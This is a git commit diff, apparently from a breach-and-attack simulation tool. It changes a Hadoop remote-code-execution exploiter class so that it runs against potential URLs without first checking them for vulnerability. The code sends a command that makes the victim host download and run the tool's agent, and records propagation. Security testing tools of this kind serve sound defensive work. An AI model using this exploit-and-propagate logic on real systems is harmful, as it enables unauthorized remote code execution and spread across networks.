Agent: Remove adding vulnerable urls in Hadoop

Adding vulnerable ulrs causes check to see if the target is exploitable
which calls self.exploit
This commit is contained in:
Ilija Lazoroski 2022-10-07 11:22:27 +02:00
parent c02d43556a
commit 25073be9f3
1 changed files with 8 additions and 12 deletions

View File

@ -51,11 +51,13 @@ class HadoopExploiter(WebRCE):
super(HadoopExploiter, self).__init__()
def _exploit_host(self):
# Try to get exploitable url
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}"
# Try to get potential urls
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
if not potential_urls:
self.exploit_result.error_message = (
f"No potential exploitable urls has been found for {self.host}"
)
self._publish_exploitation_event(False, error_message=self.exploit_result.error_message)
return self.exploit_result
monkey_path_on_victim = get_agent_dst_path(self.host)
@ -65,18 +67,12 @@ class HadoopExploiter(WebRCE):
)
command = self._build_command(monkey_path_on_victim, http_path)
timestamp = time()
try:
if self.exploit(self.vulnerable_urls[0], command):
if self.exploit(potential_urls[0], command):
self.add_executed_cmd(command)
self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True
except requests.RequestException as err:
error_message = str(err)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
self._publish_propagation_event(timestamp, False, error_message=error_message)
finally:
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()